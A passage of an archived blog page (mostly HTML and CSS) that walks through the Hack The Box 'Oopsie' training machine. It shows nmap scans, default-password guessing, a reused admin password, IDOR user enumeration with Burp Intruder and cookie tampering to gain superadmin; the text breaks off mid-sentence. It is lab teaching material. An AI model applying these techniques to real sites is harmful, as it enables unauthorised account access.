<!DOCTYPE html>
<html ⚡>
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width,minimum-scale=1,initial-scale=1">

    <title>Oopsie Walkthrough</title>

    <link rel="icon" href="../../favicon.ico" type="image/x-icon" />
    <link rel="canonical" href="../index.html" />
    <meta name="referrer" content="no-referrer-when-downgrade" />
    
    <meta property="og:site_name" content="h4rithd.com" />
    <meta property="og:type" content="article" />
    <meta property="og:title" content="Oopsie Walkthrough" />
    <meta property="og:description" content="After the Archetype Walkthrough, here i&#x27;m with Oopsie box. Let&#x27;s hack and grab the flags. In ours pervious Archetype Walkthrough, I mentioned that the starting point machines are a series of 9 machines rated as &quot;very easy&quot; and should be rooted in a sequence. So it means, if you need" />
    <meta property="og:url" content="http://192.168.8.3:2368/starting-point-htb-oopsie-walkthrough/" />
    <meta property="og:image" content="http://192.168.8.3:2368/content/images/2021/05/2-2.jpg" />
    <meta property="article:published_time" content="2021-04-28T21:19:00.000Z" />
    <meta property="article:modified_time" content="2021-05-27T10:42:04.000Z" />
    <meta property="article:tag" content="HackTheBox" />
    <meta property="article:tag" content="HarithDilshan" />
    <meta property="article:tag" content="StartingPoint" />
    <meta property="article:tag" content="h4rithd" />
    <meta property="article:tag" content="Oopsie Walkthrough" />
    <meta property="article:tag" content="HTB Walkthrough" />
    <meta property="article:tag" content="HTB Writeup" />
    <meta property="article:tag" content="Writeup" />
    <meta property="article:tag" content="Oopsie" />
    
    <meta property="article:publisher" content="https://www.facebook.com/ShapManasick" />
    <meta name="twitter:card" content="summary_large_image" />
    <meta name="twitter:title" content="Oopsie Walkthrough" />
    <meta name="twitter:description" content="After the Archetype Walkthrough, here i&#x27;m with Oopsie box. Let&#x27;s hack and grab the flags. In ours pervious Archetype Walkthrough, I mentioned that the starting point machines are a series of 9 machines rated as &quot;very easy&quot; and should be rooted in a sequence. So it means, if you need" />
    <meta name="twitter:url" content="http://192.168.8.3:2368/starting-point-htb-oopsie-walkthrough/" />
    <meta name="twitter:image" content="http://192.168.8.3:2368/content/images/2021/05/2-2.jpg" />
    <meta name="twitter:label1" content="Written by" />
    <meta name="twitter:data1" content="Harith Dilshan" />
    <meta name="twitter:label2" content="Filed under" />
    <meta name="twitter:data2" content="HackTheBox, HarithDilshan, StartingPoint, h4rithd, Oopsie Walkthrough, HTB Walkthrough, HTB Writeup, Writeup, Oopsie" />
    <meta name="twitter:site" content="@h4rithd" />
    <meta property="og:image:width" content="1920" />
    <meta property="og:image:height" content="1182" />
    
    <script type="application/ld+json">
{
    "@context": "https://schema.org",
    "@type": "Article",
    "publisher": {
        "@type": "Organization",
        "name": "h4rithd.com",
        "url": "http://192.168.8.3:2368/",
        "logo": {
            "@type": "ImageObject",
            "url": "http://192.168.8.3:2368/content/images/2021/05/my.png",
            "width": 60,
            "height": 60
        }
    },
    "author": {
        "@type": "Person",
        "name": "Harith Dilshan",
        "image": {
            "@type": "ImageObject",
            "url": "http://192.168.8.3:2368/content/images/2021/05/176773693_2267679413366261_3955357600281674809_n-2.jpg",
            "width": 2000,
            "height": 2000
        },
        "url": "http://192.168.8.3:2368/author/harith/",
        "sameAs": []
    },
    "headline": "Oopsie Walkthrough",
    "url": "http://192.168.8.3:2368/starting-point-htb-oopsie-walkthrough/",
    "datePublished": "2021-04-28T21:19:00.000Z",
    "dateModified": "2021-05-27T10:42:04.000Z",
    "image": {
        "@type": "ImageObject",
        "url": "http://192.168.8.3:2368/content/images/2021/05/2-2.jpg",
        "width": 1920,
        "height": 1182
    },
    "keywords": "HackTheBox, HarithDilshan, StartingPoint, h4rithd, Oopsie Walkthrough, HTB Walkthrough, HTB Writeup, Writeup, Oopsie",
    "description": "After the Archetype Walkthrough, here i&#x27;m with Oopsie box. Let&#x27;s hack and grab\nthe flags.\n\n\n--------------------------------------------------------------------------------\n\nIn ours pervious Archetype\n[https://h4rithd.com/blog/starting-point-htb-archetype-walkthrough/index.html]\nWalkthrough, I mentioned that the starting point machines are a series of 9\nmachines rated as &quot;very easy&quot; and should be rooted in a sequence. So it means,\nif you need to go through this box, you must have a complete Arch",
    "mainEntityOfPage": {
        "@type": "WebPage",
        "@id": "http://192.168.8.3:2368/"
    }
}
    </script>

    <meta name="generator" content="Ghost 4.6" />
    <link rel="alternate" type="application/rss+xml" title="h4rithd.com" href="../../rss/index.html" />

    <style amp-custom>
    *,
    *::before,
    *::after {
        box-sizing: border-box;
    }

    html {
        overflow-x: hidden;
        overflow-y: scroll;
        font-size: 62.5%;
        -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
    }

    body {
        min-height: 100vh;
        margin: 0;
        padding: 0;
        color: #3a4145;
        font-family: -apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen,Ubuntu,Cantarell,Open Sans,Helvetica Neue,sans-serif;
        font-size: 1.7rem;
        line-height: 1.55em;
        font-weight: 400;
        font-style: normal;
        background: #fff;
        scroll-behavior: smooth;
        overflow-x: hidden;
        -webkit-font-smoothing: antialiased;
        -moz-osx-font-smoothing: grayscale;
    }

    p,
    ul,
    ol,
    li,
    dl,
    dd,
    hr,
    pre,
    form,
    table,
    video,
    figure,
    figcaption,
    blockquote {
        margin: 0;
        padding: 0;
    }

    ul[class],
    ol[class] {
        padding: 0;
        list-style: none;
    }

    img {
        display: block;
        max-width: 100%;
    }

    input,
    button,
    select,
    textarea {
        font: inherit;
        -webkit-appearance: none;
    }

    fieldset {
        margin: 0;
        padding: 0;
        border: 0;
    }

    label {
        display: block;
        font-size: 0.9em;
        font-weight: 700;
    }

    hr {
        position: relative;
        display: block;
        width: 100%;
        height: 1px;
        border: 0;
        border-top: 1px solid currentcolor;
        opacity: 0.1;
    }

    ::selection {
        text-shadow: none;
        background: #cbeafb;
    }

    mark {
        background-color: #fdffb6;
    }

    small {
        font-size: 80%;
    }

    sub,
    sup {
        position: relative;
        font-size: 75%;
        line-height: 0;
        vertical-align: baseline;
    }
    sup {
        top: -0.5em;
    }
    sub {
        bottom: -0.25em;
    }

    ul li + li {
        margin-top: 0.6em;
    }

    a {
        color: var(--ghost-accent-color, #1292EE);
        text-decoration-skip-ink: auto;
    }

    h1,
    h2,
    h3,
    h4,
    h5,
    h6 {
        margin: 0;
        font-weight: 700;
        color: #121212;
        line-height: 1.4em;
    }

    h1 {
        font-size: 3.4rem;
        line-height: 1.1em;
    }

    h2 {
        font-size: 2.4rem;
        line-height: 1.2em;
    }

    h3 {
        font-size: 1.8rem;
    }

    h4 {
        font-size: 1.7rem;
    }

    h5 {
        font-size: 1.6rem;
    }

    h6 {
        font-size: 1.6rem;
    }

    amp-img {
        height: 100%;
        width: 100%;
        max-width: 100%;
        max-height: 100%;
    }

    amp-img img {
        object-fit: cover;
    }

    .page-header {
        padding: 50px 5vmin 30px;
        text-align: center;
        font-size: 2rem;
        text-transform: uppercase;
        letter-spacing: 0.5px;
    }

    .page-header a {
        color: #121212;
        font-weight: 700;
        text-decoration: none;
        font-size: 1.6rem;
        letter-spacing: -0.1px;
    }

    .post {
        max-width: 680px;
        margin: 0 auto;
    }

    .post-header {
        margin: 0 5vmin 5vmin;
        text-align: center;
    }

    .post-meta {
        margin: 1rem 0 0 0;
        text-transform: uppercase;
        color: #738a94;
        font-weight: 500;
        font-size: 1.3rem;
    }

    .post-image {
        margin: 0 0 5vmin;
    }

    .post-image img {
        display: block;
        width: 100%;
        height: auto;
    }

    .post-content {
        padding: 0 5vmin;
    }

    .post-content > * + * {
        margin-top: 1.5em;
    }

    .post-content [id]:not(:first-child) {
        margin: 2em 0 0;
    }

    .post-content > [id] + * {
        margin-top: 1rem;
    }

    .post-content [id] + .kg-card,
    .post-content blockquote + .kg-card {
        margin-top: 40px;
    }

    .post-content > ul,
    .post-content > ol,
    .post-content > dl {
        padding-left: 1.9em;
    }

    .post-content hr {
        margin-top: 40px;
    }

    .post .post-content hr + * {
        margin-top: 40px;
    }

    .post-content amp-img {
        background-color: #f8f8f8;
    }

    .post-content blockquote {
        position: relative;
        font-style: italic;
    }

    .post-content blockquote::before {
        content: "";
        position: absolute;
        left: -1.5em;
        top: 0;
        bottom: 0;
        width: 0.3rem;
        background: var(--ghost-accent-color, #1292EE);
    }

    .post-content :not(.kg-card):not([id]) + .kg-card {
        margin-top: 40px;
    }

    .post-content .kg-card + :not(.kg-card) {
        margin-top: 40px;
    }

    .kg-card figcaption {
        padding: 1.5rem 1.5rem 0;
        text-align: center;
        font-weight: 500;
        font-size: 1.3rem;
        line-height: 1.4em;
        opacity: 0.6;
    }

    .kg-card figcaption strong {
        color: rgba(0,0,0,0.8);
    }

    .post-content :not(pre) code {
        vertical-align: middle;
        padding: 0.15em 0.4em 0.15em;
        border: #e1eaef 1px solid;
        font-weight: 400;
        font-size: 0.9em;
        line-height: 1em;
        color: #15171a;
        background: #f0f6f9;
        border-radius: 0.25em;
    }

    .post-content > pre {
        overflow: scroll;
        padding: 16px 20px;
        color: #fff;
        background: #1F2428;
        border-radius: 5px;
        box-shadow: 0 2px 6px -2px rgba(0,0,0,.1), 0 0 1px rgba(0,0,0,.4);
    }

    .kg-embed-card {
        display: flex;
        flex-direction: column;
        align-items: center;
        width: 100%;
    }

    .kg-image-card img {
        margin: auto;
    }

    .kg-gallery-card + .kg-gallery-card {
        margin-top: 0.75em;
    }

    .kg-gallery-container {
        position: relative;
    }

    .kg-gallery-row {
        display: flex;
        flex-direction: row;
        justify-content: center;
    }

    .kg-gallery-image {
        width: 100%;
        height: 100%;
    }

    .kg-gallery-row:not(:first-of-type) {
        margin: 0.75em 0 0 0;
    }

    .kg-gallery-image:not(:first-of-type) {
        margin: 0 0 0 0.75em;
    }

    .kg-bookmark-card,
    .kg-bookmark-publisher {
        position: relative;
    }

    .kg-bookmark-container,
    .kg-bookmark-container:hover {
        display: flex;
        flex-wrap: wrap;
        flex-direction: row-reverse;
        color: currentColor;
        background: rgba(255,255,255,0.6);
        font-family: -apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen,Ubuntu,Cantarell,Open Sans,Helvetica Neue,sans-serif;
        text-decoration: none;
        border-radius: 5px;
        box-shadow: 0 2px 6px -2px rgba(0, 0, 0, 0.1), 0 0 1px rgba(0, 0, 0, 0.4);
        overflow: hidden;
    }

    .kg-bookmark-content {
        flex-basis: 0;
        flex-grow: 999;
        padding: 20px;
        order: 1;
    }

    .kg-bookmark-title {
        font-weight: 600;
        font-size: 1.5rem;
        line-height: 1.3em;
    }

    .kg-bookmark-description {
        display: -webkit-box;
        max-height: 45px;
        margin: 0.5em 0 0 0;
        font-size: 1.4rem;
        line-height: 1.55em;
        overflow: hidden;
        opacity: 0.8;
        -webkit-line-clamp: 2;
        -webkit-box-orient: vertical;
    }

    .kg-bookmark-metadata {
        margin-top: 20px;
    }

    .kg-bookmark-metadata {
        display: flex;
        align-items: center;
        font-weight: 500;
        font-size: 1.3rem;
        line-height: 1.3em;
        white-space: nowrap;
        overflow: hidden;
        text-overflow: ellipsis;
    }

    .kg-bookmark-description {
        display: -webkit-box;
        -webkit-box-orient: vertical;
        -webkit-line-clamp: 2;
        overflow: hidden;
    }

    .kg-bookmark-metadata amp-img {
        width: 18px;
        height: 18px;
        max-width: 18px;
        max-height: 18px;
        margin-right: 10px;
    }

    .kg-bookmark-thumbnail {
        display: flex;
        flex-basis: 20rem;
        flex-grow: 1;
        justify-content: flex-end;
    }

    .kg-bookmark-thumbnail amp-img {
        max-height: 200px;
    }

    .kg-bookmark-author {
        white-space: nowrap;
        text-overflow: ellipsis;
        overflow: hidden;
    }

    .kg-bookmark-publisher::before {
        content: "•";
        margin: 0 .5em;
    }

    .kg-width-full.kg-card-hascaption {
        display: grid;
        grid-template-columns: inherit;
    }

    .post-content table {
        border-collapse: collapse;
        width: 100%;
    }

    .post-content th {
        padding: 0.5em 0.8em;
        text-align: left;
        font-size: .75em;
        text-transform: uppercase;
    }

    .post-content td {
        padding: 0.4em 0.7em;
    }

    .post-content tbody tr:nth-child(2n + 1) {
        background-color: rgba(0,0,0,0.1);
        padding: 1px;
    }

    .post-content tbody tr:nth-child(2n + 2) td:last-child {
        box-shadow:
            inset 1px 0 rgba(0,0,0,0.1),
            inset -1px 0 rgba(0,0,0,0.1);
    }

    .post-content tbody tr:nth-child(2n + 2) td {
        box-shadow: inset 1px 0 rgba(0,0,0,0.1);
    }

    .post-content tbody tr:last-child {
        border-bottom: 1px solid rgba(0,0,0,.1);
    }

    .page-footer {
        padding: 60px 5vmin;
        margin: 60px auto 0;
        text-align: center;
        background-color: #f8f8f8;
    }

    .page-footer h3 {
        margin: 0.5rem 0 0 0;
    }

    .page-footer p {
        max-width: 500px;
        margin: 1rem auto 1.5rem;
        font-size: 1.7rem;
        line-height: 1.5em;
        color: rgba(0,0,0,0.6)
    }

    .powered {
        display: inline-flex;
        align-items: center;
        margin: 30px 0 0;
        padding: 6px 9px 6px 6px;
        border: rgba(0,0,0,0.1) 1px solid;
        font-size: 12px;
        line-height: 12px;
        letter-spacing: -0.2px;
        font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Roboto", "Oxygen", "Ubuntu", "Cantarell", "Fira Sans", "Droid Sans", "Helvetica Neue", sans-serif;
        font-weight: 500;
        color: #222;
        text-decoration: none;
        background: #fff;
        border-radius: 6px;
    }

    .powered svg {
        height: 16px;
        width: 16px;
        margin: 0 6px 0 0;
    }

    @media (max-width: 600px) {
        body {
            font-size: 1.6rem;
        }
        h1 {
            font-size: 3rem;
        }

        h2 {
            font-size: 2.2rem;
        }
    }

    @media (max-width: 400px) {
        h1 {
            font-size: 2.6rem;
            line-height: 1.15em;
        }
        h2 {
            font-size: 2rem;
            line-height: 1.2em;
        }
        h3 {
            font-size: 1.7rem;
        }
    }

    :root {--ghost-accent-color: #006ac7;}
    </style>

    <style amp-boilerplate>body{-webkit-animation:-amp-start 8s steps(1,end) 0s 1 normal both;-moz-animation:-amp-start 8s steps(1,end) 0s 1 normal both;-ms-animation:-amp-start 8s steps(1,end) 0s 1 normal both;animation:-amp-start 8s steps(1,end) 0s 1 normal both}@-webkit-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-moz-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-ms-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-o-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}</style><noscript><style amp-boilerplate>body{-webkit-animation:none;-moz-animation:none;-ms-animation:none;animation:none}</style></noscript>
    <script async src="https://cdn.ampproject.org/v0.js"></script>

    

</head>

<body class="amp-template">
    <header class="page-header">
        <a href="../../index.html">
                <amp-img class="site-icon" src="http://192.168.8.3:2368/content/images/2021/05/hnet.com-image.ico" width="50" height="50" layout="fixed"></amp-img>
        </a>
    </header>

    <main class="content" role="main">
        <article class="post">

            <header class="post-header">
                <h1 class="post-title">Oopsie Walkthrough</h1>
                <section class="post-meta">
                    Harith Dilshan -
                    <time class="post-date" datetime="2021-04-29">29 Apr 2021</time>
                </section>
            </header>
            <figure class="post-image">
                <amp-img src="http://192.168.8.3:2368/content/images/2021/05/2-2.jpg" width="600" height="340" layout="responsive"></amp-img>
            </figure>
            <section class="post-content">

                <p>After the Archetype Walkthrough, here i'm with Oopsie box. Let's hack and grab the flags.</p><hr></hr><p>In ours pervious <a href="https://h4rithd.com/blog/starting-point-htb-archetype-walkthrough/index.html">Archetype </a>Walkthrough, I mentioned that the starting point machines are a series of 9 machines rated as "<strong>very easy" </strong>and should be rooted in a sequence. So it means, if you need to go through this box, you must have a complete <a href="https://h4rithd.com/blog/starting-point-htb-archetype-walkthrough/index.html">Archetype</a> machine.</p><p>Enough talks 🥱, let's start to hack. 🐱‍💻</p><blockquote><strong>Disclaimers: </strong>No flags (user/root) are shown in this writeup (as usual in writeups), so follow the procedures to grab the flags! 🐱‍👤</blockquote><hr></hr><h2 id="00-start-machine-%E2%80%A6">00. Start Machine …</h2><p>To start machine, Just click "<strong>Join Machine</strong>".</p><figure class="kg-card kg-image-card kg-card-hascaption"><amp-img src="http://192.168.8.3:2368/content/images/2021/05/image-6.png" class="kg-image" alt width="1636" height="761" srcset="http://192.168.8.3:2368/content/images/size/w600/2021/05/image-6.png 600w, http://192.168.8.3:2368/content/images/size/w1000/2021/05/image-6.png 1000w, http://192.168.8.3:2368/content/images/size/w1600/2021/05/image-6.png 1600w, http://192.168.8.3:2368/content/images/2021/05/image-6.png 1636w" layout="responsive"></amp-img><figcaption>Start Oopsie Machine</figcaption></figure><p>Then you can see the <strong>IP</strong> address for that machine. usually it is <strong>10.10.10.28 🤠</strong></p><figure class="kg-card kg-image-card kg-card-hascaption"><amp-img src="http://192.168.8.3:2368/content/images/2021/05/image-7.png" class="kg-image" alt width="429" height="525" layout="responsive"></amp-img><figcaption>10.10.10.28</figcaption></figure><p>Before going enumeration steps we can simply ping to the IP address and check our VPN connection and whether the machine is alive. Sometimes the machines might "Disable" ping requests from passing through the firewall. But in most cases ping will be a success!</p><pre><code class="language-bash">┌──(root💀Hidd3nWiki)-[~/Documents/Oopsie]
└─# ping 10.10.10.28 -c 2
PING 10.10.10.28 (10.10.10.28) 56(84) bytes of data.
64 bytes from 10.10.10.28: icmp_seq=1 ttl=63 time=268 ms
64 bytes from 10.10.10.28: icmp_seq=2 ttl=63 time=282 ms

--- 10.10.10.28 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1001ms
rtt min/avg/max/mdev = 267.817/274.911/282.006/7.094 ms</code></pre><p>As a ping result, It's <code>TTL=63</code>. There is one route between machine and us (VPN) so it's definitely it will be <code>Linux</code> machine.</p><hr></hr><h2 id="01-enumeration-first-%E2%80%A6">01. Enumeration First …</h2><h3 id="%E2%80%8C011-fast-ports-scan">‌01.1 Fast ports scan</h3><p>As usual, run Nmap fast scan for all TCP ports to identify the ports which are open.</p><pre><code class="language-bash">nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.28</code></pre><pre><code class="language-bash">-n  : Never do DNS resolution
-vv	: Extra verbosity
--open	: Output only open ports
-p-	: Full TCP ports range (65535)
-T4	: Aggressive (4) speeds scans; assumes you are on a reasonably fast and reliable network</code></pre><p>Here is the output 👇</p><pre><code class="language-bash">┌──(root💀Hidd3nWiki)-[~/Documents/Oopsie]
└─# nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.28
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-16 05:28 EDT
Initiating Ping Scan at 05:28
Scanning 10.10.10.28 [4 ports]
Completed Ping Scan at 05:28, 0.29s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 05:28
Scanning 10.10.10.28 [65535 ports]
Discovered open port 80/tcp on 10.10.10.28
Discovered open port 22/tcp on 10.10.10.28
SYN Stealth Scan Timing: About 31.38% done; ETC: 05:29 (0:01:08 remaining)
Completed SYN Stealth Scan at 05:30, 108.95s elapsed (65535 total ports)
Nmap scan report for 10.10.10.28
Host is up, received echo-reply ttl 63 (0.32s latency).
Scanned at 2021-04-16 05:28:18 EDT for 109s
Not shown: 65533 closed ports
Reason: 65533 resets
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63           * (Interesting)
80/tcp open  http    syn-ack ttl 63           * (Interesting)

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 109.41 seconds
           Raw packets sent: 93007 (4.092MB) | Rcvd: 92692 (3.708MB)</code></pre><p>Now we know which ports are open, Here we can see some  <strong>* (Interesting)</strong> ports.</p><h3 id="012-run-nmap-scripting-engine">01.2 Run Nmap Scripting Engine</h3><p>To get the best result we can run the <code>Nmap Scripting Engine</code> for all open ports. Now we know all the open ports. So we can point out and run the script engine as fast as possible.</p><pre><code class="language-bash">┌──(root💀Hidd3nWiki)-[~/Documents/Oopsie]
└─# nmap -sV -sC -oN DetailPorts.nmap -p 22,80 10.10.10.28
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-16 05:33 EDT
Nmap scan report for 10.10.10.28
Host is up (0.39s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 61:e4:3f:d4:1e:e2:b2:f1:0d:3c:ed:36:28:36:67:c7 (RSA)
|   256 24:1d:a4:17:d4:e3:2a:9c:90:5c:30:58:8f:60:77:8d (ECDSA)
|_  256 78:03:0e:b4:a1:af:e5:c2:f9:8d:29:05:3e:29:c9:f2 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Welcome
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.81 seconds</code></pre><p>I have some trick to identify the Operating System using SSH version. I got it from <a href="https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA/videos" rel="noopener noreferrer">IppSec's </a>walkthroughs. Thanks <a href="https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA/videos" rel="noopener noreferrer">IppSec </a>for your valuable walkthroughs 🙏. Here is the trick. If you see the SSH version like <strong><code>OpenSSH 7.6p1 Ubuntu 4ubuntu0.3</code> </strong>just copy it and search through google. In the search results you can find domain called <code>launchpad.net</code>. It contains some important details like Ubuntu Releases, last update, publishing details and more important is <strong>builds</strong>. Likewise, in this case it is  <code>Bionic</code>.</p><figure class="kg-card kg-image-card"><amp-img src="http://192.168.8.3:2368/content/images/2021/05/image-8.png" class="kg-image" alt width="1894" height="789" srcset="http://192.168.8.3:2368/content/images/size/w600/2021/05/image-8.png 600w, http://192.168.8.3:2368/content/images/size/w1000/2021/05/image-8.png 1000w, http://192.168.8.3:2368/content/images/size/w1600/2021/05/image-8.png 1600w, http://192.168.8.3:2368/content/images/2021/05/image-8.png 1894w" layout="responsive"></amp-img></figure><p>Now we know the operating system is Ubuntu and we have open ports 22 (SSH) and 80 (HTTP). Let's go to the port 80 first.</p><h3 id="013-discover-more-on-port-80">01.3 Discover more on port 80</h3><p>Open web browser and <code>Burp Suite</code>. Type http://10.10.10.28/</p><figure class="kg-card kg-image-card"><amp-img src="http://192.168.8.3:2368/content/images/2021/05/image-9.png" class="kg-image" alt width="1708" height="783" srcset="http://192.168.8.3:2368/content/images/size/w600/2021/05/image-9.png 600w, http://192.168.8.3:2368/content/images/size/w1000/2021/05/image-9.png 1000w, http://192.168.8.3:2368/content/images/size/w1600/2021/05/image-9.png 1600w, http://192.168.8.3:2368/content/images/2021/05/image-9.png 1708w" layout="responsive"></amp-img></figure><p>Here we got a nice landing page. First thing first; <code>view source code</code> and look if we have any interesting things. Unfortunately, nothing interesting found. Then we can see the traffic on burp.</p><figure class="kg-card kg-image-card"><amp-img src="http://192.168.8.3:2368/content/images/2021/05/image-10.png" class="kg-image" alt width="713" height="258" srcset="http://192.168.8.3:2368/content/images/size/w600/2021/05/image-10.png 600w, http://192.168.8.3:2368/content/images/2021/05/image-10.png 713w" layout="responsive"></amp-img></figure><p>In here, you can find some endpoint, so let's jump into it.</p><figure class="kg-card kg-image-card"><amp-img src="http://192.168.8.3:2368/content/images/2021/05/image-11.png" class="kg-image" alt width="609" height="211" srcset="http://192.168.8.3:2368/content/images/size/w600/2021/05/image-11.png 600w, http://192.168.8.3:2368/content/images/2021/05/image-11.png 609w" layout="responsive"></amp-img></figure><p>But I got nothing, it's just a blank page. Hmm, what about "<a href="http://10.10.10.28/cdn-cgi/login/" rel="noopener noreferrer">http://10.10.10.28/cdn-cgi/login/</a>" ah, let's check...</p><figure class="kg-card kg-image-card"><amp-img src="http://192.168.8.3:2368/content/images/2021/05/image-12.png" class="kg-image" alt width="1716" height="781" srcset="http://192.168.8.3:2368/content/images/size/w600/2021/05/image-12.png 600w, http://192.168.8.3:2368/content/images/size/w1000/2021/05/image-12.png 1000w, http://192.168.8.3:2368/content/images/size/w1600/2021/05/image-12.png 1600w, http://192.168.8.3:2368/content/images/2021/05/image-12.png 1716w" layout="responsive"></amp-img></figure><p>It contains a login page. lets check basic default username password like,</p><ul><li>admin : admin</li><li>admin : admin123</li><li>admin : password</li><li>admin : pa$$w0rd</li></ul><p>Nothing worked.😢 Oh wait, wait.. Do you remember we got some password at the end of Archetype machine? Try to remember, it was <strong><code>MEGACORP_4dm1n!!</code></strong>. Let's check this one as well.</p><p><code>admin : MEGACORP_4dm1n!!</code></p><figure class="kg-card kg-image-card"><amp-img src="http://192.168.8.3:2368/content/images/2021/05/image-13.png" class="kg-image" alt width="1723" height="783" srcset="http://192.168.8.3:2368/content/images/size/w600/2021/05/image-13.png 600w, http://192.168.8.3:2368/content/images/size/w1000/2021/05/image-13.png 1000w, http://192.168.8.3:2368/content/images/size/w1600/2021/05/image-13.png 1600w, http://192.168.8.3:2368/content/images/2021/05/image-13.png 1723w" layout="responsive"></amp-img></figure><p>We got our dashboard. and now it's time to check page source.</p><figure class="kg-card kg-image-card kg-card-hascaption"><amp-img src="https://gblobscdn.gitbook.com/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MYPAy_4MiWDii2x1cWn%2F-MYPhbB-Fm0c88IOadpK%2Fimage.png?alt=media&amp;token=0c9f6fd5-c38e-4830-bc3e-4c81b7c99bac" class="kg-image" alt="view-source:http://10.10.10.28/cdn-cgi/login/admin.php" width="950" height="153" layout="responsive"></amp-img><figcaption><span class="text-4505230f--TextH400-3033861f--textContentFamily-49a318e1"><div><div>view-source:http://10.10.10.28/cdn-cgi/login/admin.php</div><div>Enter a caption for this image (optional)</div></div></span></figcaption></figure><p><br />Here 👆 we have some interesting links. let's check one-by-one.</p><figure class="kg-card kg-image-card"><amp-img src="http://192.168.8.3:2368/content/images/2021/05/image-14.png" class="kg-image" alt width="1912" height="491" srcset="http://192.168.8.3:2368/content/images/size/w600/2021/05/image-14.png 600w, http://192.168.8.3:2368/content/images/size/w1000/2021/05/image-14.png 1000w, http://192.168.8.3:2368/content/images/size/w1600/2021/05/image-14.png 1600w, http://192.168.8.3:2368/content/images/2021/05/image-14.png 1912w" layout="responsive"></amp-img></figure><p><br />In upload section they say "if you need to upload anything, please be a <strong>superadmin </strong>!". hmm ok let's check other ones.</p><figure class="kg-card kg-image-card"><amp-img src="http://192.168.8.3:2368/content/images/2021/05/image-15.png" class="kg-image" alt width="1915" height="512" srcset="http://192.168.8.3:2368/content/images/size/w600/2021/05/image-15.png 600w, http://192.168.8.3:2368/content/images/size/w1000/2021/05/image-15.png 1000w, http://192.168.8.3:2368/content/images/size/w1600/2021/05/image-15.png 1600w, http://192.168.8.3:2368/content/images/2021/05/image-15.png 1915w" layout="responsive"></amp-img></figure><p>Oh!, now I smell some <code>IDOR vulnerability</code>. Isn't it ?? Let's check ..</p><figure class="kg-card kg-image-card kg-card-hascaption"><amp-img src="https://gblobscdn.gitbook.com/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MYPAy_4MiWDii2x1cWn%2F-MYPicZwSy2d0RZl5MAh%2Fimage.png?alt=media&amp;token=b4068d78-e774-4c4d-bc11-fbfec16654f7" class="kg-image" alt width="1914" height="549" layout="responsive"></amp-img><figcaption><span class="text-4505230f--TextH400-3033861f--textContentFamily-49a318e1"><div><div>IDOR in id=1</div><div>Enter a caption for this image (optional)</div></div></span></figcaption></figure><p>I send this request to <code>burp intruder</code> and change settings like below 👇</p><figure class="kg-card kg-image-card kg-card-hascaption"><amp-img src="https://gblobscdn.gitbook.com/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MYPAy_4MiWDii2x1cWn%2F-MYPjCuHNPHV0nbERb7y%2Fimage.png?alt=media&amp;token=6bbf461c-f43c-4a99-858b-634b73788b23" class="kg-image" alt width="1177" height="344" layout="responsive"></amp-img><figcaption><span class="text-4505230f--TextH400-3033861f--textContentFamily-49a318e1"><div><div>Intruder options - Payload Positions</div><div>Enter a caption for this image (optional)</div></div></span></figcaption></figure><figure class="kg-card kg-image-card"><amp-img src="http://192.168.8.3:2368/content/images/2021/05/image-16.png" class="kg-image" alt width="843" height="411" srcset="http://192.168.8.3:2368/content/images/size/w600/2021/05/image-16.png 600w, http://192.168.8.3:2368/content/images/2021/05/image-16.png 843w" layout="responsive"></amp-img></figure><p>Let's start the <strong>attack</strong>.</p><figure class="kg-card kg-image-card kg-card-hascaption"><amp-img src="https://gblobscdn.gitbook.com/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MYPAy_4MiWDii2x1cWn%2F-MYPjyb1qQ1XoeO7UbEy%2Fimage.png?alt=media&amp;token=b7249a5a-8c00-41d6-82d4-9b95c49f78e3" class="kg-image" alt width="1174" height="789" layout="responsive"></amp-img><figcaption><span class="text-4505230f--TextH400-3033861f--textContentFamily-49a318e1"><div><div>Attack Result Set</div><div>Enter a caption for this image (optional)</div></div></span></figcaption></figure><p>Above I sorted the output result by the length, There are more users and now I got a super admin Access ID and Email. So let's jump back to the upload section again. But now we <code>intercept</code> the web traffic through <code>Burp Proxy</code>.</p><figure class="kg-card kg-image-card kg-card-hascaption"><amp-img src="https://gblobscdn.gitbook.com/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MYPAy_4MiWDii2x1cWn%2F-MYPkyGOXE29s6ApSZgv%2Fimage.png?alt=media&amp;token=27e9fe8d-51f4-4b7d-a4ba-aed6de7831b3" class="kg-image" alt width="1881" height="469" layout="responsive"></amp-img><figcaption><span class="text-4505230f--TextH400-3033861f--textContentFamily-49a318e1"><div><div>Enter a caption for this image (optional)</div></div></span></figcaption></figure><p>When you refresh the page you can see the cookie contain something like user id and role. so let's alter those values by super admin and then click forward the traffic.</p><blockquote>I was done this using match and replace method on burp. it will be more quick rather than 